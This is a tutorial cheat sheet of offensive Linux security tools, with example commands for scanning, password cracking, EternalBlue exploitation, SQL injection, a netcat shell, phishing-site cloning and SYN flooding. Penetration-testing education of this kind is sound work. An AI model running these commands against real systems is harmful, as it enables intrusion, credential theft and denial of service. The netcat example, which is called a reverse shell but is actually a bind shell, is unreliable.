Offensive Linux security tools are primarily used for penetration testing, ethical hacking, vulnerability assessment, and exploiting system weaknesses. These tools help security professionals identify vulnerabilities in Linux systems before malicious actors can exploit them. Below are some of the most commonly used offensive Linux security tools, along with their examples and usage.
### 1. **Nmap**
**Nmap (Network Mapper)** is a popular network scanning tool used to discover hosts and services on a network, and it’s often used to identify open ports, services, and vulnerabilities.
- **Example: Scan a specific IP range for open ports**
```bash
nmap -sS 192.168.1.0/24
```
This command performs a TCP SYN scan to identify which ports are open on the target network.
- **Example: Scan for version detection and OS fingerprinting**
```bash
nmap -sV -O 192.168.1.10
```
This command detects the service version running on each port and tries to determine the target’s operating system.
### 2. **Metasploit**
**Metasploit** is a widely used framework for developing, testing, and executing exploits against a target system.
- **Example: Launch a basic exploit using Metasploit**
```bash
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.10
exploit
```
This exploits the EternalBlue SMB vulnerability on a Windows machine.
### 3. **Hydra**
**Hydra** is a fast and flexible password-cracking tool used for performing brute force attacks on network services like SSH, FTP, and HTTP.
- **Example: Brute force attack on SSH**
```bash
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
```
This command attempts to brute force the SSH login with the username `root` using the RockYou password list.
### 4. **Nikto**
**Nikto** is an open-source web server scanner that looks for vulnerabilities such as outdated software, dangerous files, or misconfigurations.
- **Example: Scan a website for vulnerabilities**
```bash
nikto -h http://example.com
```
This command scans the target website for known vulnerabilities and potential security issues.
### 5. **John the Ripper**
**John the Ripper** is a fast password-cracking tool that supports various encryption algorithms. It’s often used to crack password hashes.
- **Example: Crack a password hash**
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```
This command uses the RockYou wordlist to try and crack the passwords contained in the `hash.txt` file.
### 6. **Wireshark**
**Wireshark** is a network protocol analyzer that captures and inspects packets in real-time, useful for intercepting and analyzing network traffic.
- **Example: Capture all traffic on a specific interface**
```bash
wireshark -i eth0
```
This captures all network traffic on the `eth0` interface, allowing you to analyze it for potential vulnerabilities.
### 7. **Aircrack-ng**
**Aircrack-ng** is a suite of tools used for assessing Wi-Fi network security. It’s often used for cracking WEP/WPA-PSK keys.
- **Example: Crack a WEP key**
```bash
airodump-ng wlan0
aircrack-ng -b [BSSID] capturefile.cap
```
This captures wireless traffic and attempts to crack the WEP key from the `.cap` file.
### 8. **sqlmap**
**sqlmap** is an open-source tool used to detect and exploit SQL injection vulnerabilities in web applications.
- **Example: Exploit SQL injection vulnerability**
```bash
sqlmap -u "http://example.com/page?id=1" --dbs
```
This command identifies and exploits a SQL injection vulnerability in the target website, listing available databases.
### 9. **Hashcat**
**Hashcat** is a fast password recovery tool that supports a wide variety of hashing algorithms, including MD5, SHA1, SHA256, and more.
- **Example: Crack a hash using a dictionary attack**
```bash
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
```
This command attempts to crack the hash in `hash.txt` using the RockYou wordlist.
### 10. **Burp Suite**
**Burp Suite** is a web application security testing tool that allows penetration testers to perform various types of attacks, such as SQL injection, XSS, and CSRF.
- **Example: Intercept HTTP traffic**
Configure Burp Suite as a proxy in your browser to intercept and analyze HTTP requests and responses. This can help identify and exploit web vulnerabilities.
### 11. **Netcat (nc)**
**Netcat** is a versatile networking tool used for creating TCP/UDP connections, and it’s often used for port scanning, banner grabbing, and establishing backdoors.
- **Example: Create a reverse shell**
On the target machine:
```bash
nc -lvp 4444 -e /bin/bash
```
On the attacking machine:
```bash
nc [target_ip] 4444
```
This sets up a reverse shell connection on port 4444, allowing the attacker to control the target machine.
### 12. **Social-Engineer Toolkit (SET)**
**SET** is a framework designed for social engineering attacks, such as phishing, credential harvesting, and email spoofing.
- **Example: Create a phishing site**
```bash
setoolkit
```
Select the phishing attack vector, choose the website to clone, and it creates a phishing page to capture user credentials.
### 13. **hping3**
**hping3** is a command-line packet crafting tool used to generate custom network packets for testing firewall rules, detecting open ports, and performing DoS attacks.
- **Example: Perform a SYN flood attack**
```bash
hping3 -S --flood -V -p 80 [target_ip]
```
This sends a flood of SYN packets to port 80 on the target machine, potentially causing a denial of service.
### 14. **Sn1per**
**Sn1per** is an automated scanner used for vulnerability assessments and penetration testing.
- **Example: Perform a full scan**
```bash
sniper -t [target_ip]
```
This command runs a full scan against the target IP, including port scanning, web vulnerabilities, and more.
### 15. **Exploit-DB**
**Exploit Database (Exploit-DB)** is a repository for public exploits and vulnerabilities, used by security researchers to find and test known vulnerabilities.
- **Example: Search for a specific exploit**
```bash
searchsploit apache
```
This command searches for Apache-related exploits in the Exploit-DB repository.
---
### Common Use-Cases:
1. **Network Scanning**: Nmap, Netcat, Wireshark, hping3
2. **Web Application Testing**: Burp Suite, Nikto, sqlmap, OWASP ZAP
3. **Password Cracking**: John the Ripper, Hydra, Hashcat
4. **Wi-Fi Penetration Testing**: Aircrack-ng
5. **Exploitation**: Metasploit, Sn1per
6. **Social Engineering**: Social-Engineer Toolkit (SET)
These tools, when used responsibly by security professionals, are crucial for identifying vulnerabilities, securing systems, and ensuring compliance with security best practices. They should only be used in legal environments with proper authorization.